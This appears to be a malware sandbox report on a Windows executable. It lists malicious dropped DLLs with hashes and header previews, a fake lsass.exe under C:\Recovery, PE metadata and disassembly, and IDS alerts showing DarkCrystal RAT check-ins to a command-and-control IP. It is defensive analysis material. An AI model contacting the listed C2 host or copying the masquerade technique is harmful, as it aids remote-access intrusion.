SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tIBixNUy.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\uhqhlNja.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vXhOtgDl.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\whSGRYvh.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	182
Entropy (8bit):	4.440230761468008
Encrypted:	false
SSDEEP:	3:mKzGGHQ6TpvmWiA3XLTSoYALTSoYALTSoYALTSoYALTSov:Pzzw69vmWxHLTSJALTSJALTSJALTSJA7
MD5:	8F42ACEB168881E6F98E6BBAF34A8E24
SHA1:	749DD367E5C57C0216B2AC180720E3C448317ED0
SHA-256:	7C40BBE2CFACA39C1EDD31530308DB7C104180DEA4F85F499382AD656150C27A
SHA-512:	7B208502F3E7A96B481D01258BAA8737EF414DA1C67FDBE13D9B91619E4FA0716D01EC563C58ADB3D2168F5702FDC12212AB82B1B86303DC9CC45638CDD1DB49
Malicious:	false
Preview:	..Pinging 562258 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.2745479313845625
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Qsi7IgkrWa.exe
File size:	2'470'804 bytes
MD5:	6296cf36bbbbe91b8ff186d18a08afa3
SHA1:	3c71d4099d817731504433785dd2166f81d8ef15
SHA256:	5e0bd8298a3193c217f563a32aae650eb29dbb513716c34a4b7698309edd1f70
SHA512:	773640b9edeeb969c92a6835f66959d6fa1c2fc4fb2d79091475653e9c05eeaf30f330f664800eaed53a7cab52cb473b6b7b2c707a17ffaa22673b1e41fd8a67
SSDEEP:	49152:tBOdJrx6sOXg8ghhfCSUkIkA7JkUZkuyiTK:nuPOXhmgSUku7So9TK
TLSH:	76B5BF0D75914F72C274D6358E56013D52B0E7256652EB0FF6BF1293AB87BE08A322F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	3464643c696c1c63

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007F17047CCB6Bh
jmp 00007F17047CC47Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F17047BF2C7h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F17047CF90Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F17047CC60Ch
push 0000000Ch
push esi
call 00007F17047CBBC9h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F17047BF242h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F17047CF3C9h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F17047CC588h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F17047CF3ACh
int3
jmp 00007F17047D0E47h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x4698c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xab000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0x4698c	0x46a00	3f4d23126f23b7eef4868a5cf2d90300	False	0.09705821349557522	data	2.835181165535476	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xab000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64524	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6506c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66618	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144			0.057009497884427614
RT_DIALOG	0xa8640	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0xa88c8	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0xa8a04	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0xa8af0	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0xa8c20	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0xa8f58	0x252	data	English	United States	0.5757575757575758
RT_STRING	0xa91ac	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0xa9390	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0xa955c	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0xa9714	0x146	data	English	United States	0.5153374233128835
RT_STRING	0xa985c	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0xa9cc8	0x166	data	English	United States	0.49162011173184356
RT_STRING	0xa9e30	0x152	data	English	United States	0.5059171597633136
RT_STRING	0xa9f84	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0xaa090	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0xaa14c	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0xaa224	0x14	data			1.1
RT_MANIFEST	0xaa238	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-06T01:42:17.898445+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49734	37.44.238.250	80	TCP
2024-12-06T01:42:31.195384+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49737	37.44.238.250	80	TCP
2024-12-06T01:42:39.992268+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49738	37.44.238.250	80	TCP
2024-12-06T01:42:53.226683+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49739	37.44.238.250	80	TCP
2024-12-06T01:43:06.601728+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49762	37.44.238.250	80	TCP
2024-12-06T01:43:15.086183+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49781	37.44.238.250	80	TCP
2024-12-06T01:43:23.586177+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49801	37.44.238.250	80	TCP
2024-12-06T01:43:32.804998+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49823	37.44.238.250	80	TCP
2024-12-06T01:43:41.383131+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49844	37.44.238.250	80	TCP
2024-12-06T01:43:54.133125+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49872	37.44.238.250	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 01:42:16.414024115 CET	49734	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:16.531716108 CET	80	49734	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:16.531791925 CET	49734	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:16.532170057 CET	49734	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:16.649475098 CET	80	49734	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:16.883887053 CET	49734	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:17.004509926 CET	80	49734	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:17.851090908 CET	80	49734	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:17.898444891 CET	49734	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:18.085515022 CET	80	49734	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:18.132839918 CET	49734	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:18.357305050 CET	49734	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:29.757940054 CET	49737	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:29.878500938 CET	80	49737	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:29.878680944 CET	49737	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:29.878978968 CET	49737	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:29.999294996 CET	80	49737	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:30.226990938 CET	49737	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:30.348244905 CET	80	49737	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:31.150566101 CET	80	49737	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:31.195384026 CET	49737	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:31.385164022 CET	80	49737	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:31.429758072 CET	49737	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:31.856879950 CET	49737	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:38.542577982 CET	49738	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:38.664133072 CET	80	49738	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:38.666713953 CET	49738	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:38.667047024 CET	49738	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:38.787513018 CET	80	49738	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:39.023827076 CET	49738	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:39.139106035 CET	80	49738	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:39.938740969 CET	80	49738	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:39.992268085 CET	49738	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:40.173212051 CET	80	49738	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:40.226671934 CET	49738	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:40.368282080 CET	49738	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:51.756654978 CET	49739	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:51.876230955 CET	80	49739	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:51.876316071 CET	49739	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:51.876773119 CET	49739	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:51.994138002 CET	80	49739	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:52.226881981 CET	49739	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:52.346642017 CET	80	49739	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:53.176539898 CET	80	49739	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:53.226682901 CET	49739	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:53.413290024 CET	80	49739	37.44.238.250	192.168.2.4
Dec 6, 2024 01:42:53.461067915 CET	49739	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:42:53.758647919 CET	49739	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:05.129630089 CET	49762	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:05.250463963 CET	80	49762	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:05.250830889 CET	49762	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:05.251240015 CET	49762	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:05.369225979 CET	80	49762	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:05.602046013 CET	49762	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:05.717174053 CET	80	49762	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:06.552253008 CET	80	49762	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:06.601727962 CET	49762	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:06.785408974 CET	80	49762	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:06.836121082 CET	49762	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:07.005018950 CET	49762	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:13.654747963 CET	49781	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:13.771229029 CET	80	49781	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:13.771328926 CET	49781	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:13.771759033 CET	49781	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:13.892128944 CET	80	49781	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:14.117568970 CET	49781	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:14.239295959 CET	80	49781	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:15.043996096 CET	80	49781	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:15.086183071 CET	49781	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:15.297533989 CET	80	49781	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:15.351798058 CET	49781	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:15.525300980 CET	49781	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:22.115838051 CET	49801	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:22.230952024 CET	80	49801	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:22.231034040 CET	49801	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:22.231400967 CET	49801	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:22.349409103 CET	80	49801	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:22.586354017 CET	49801	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:22.707000971 CET	80	49801	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:23.535892010 CET	80	49801	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:23.586177111 CET	49801	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:23.769431114 CET	80	49801	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:23.820552111 CET	49801	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:24.140199900 CET	49801	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:31.376931906 CET	49823	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:31.491947889 CET	80	49823	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:31.492028952 CET	49823	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:31.492314100 CET	49823	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:31.609966040 CET	80	49823	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:31.852133989 CET	49823	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:31.967112064 CET	80	49823	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:32.761173964 CET	80	49823	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:32.804997921 CET	49823	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:32.993482113 CET	80	49823	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:33.039338112 CET	49823	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:33.192466974 CET	49823	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:39.922027111 CET	49844	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:40.039762974 CET	80	49844	37.44.238.250	192.168.2.4
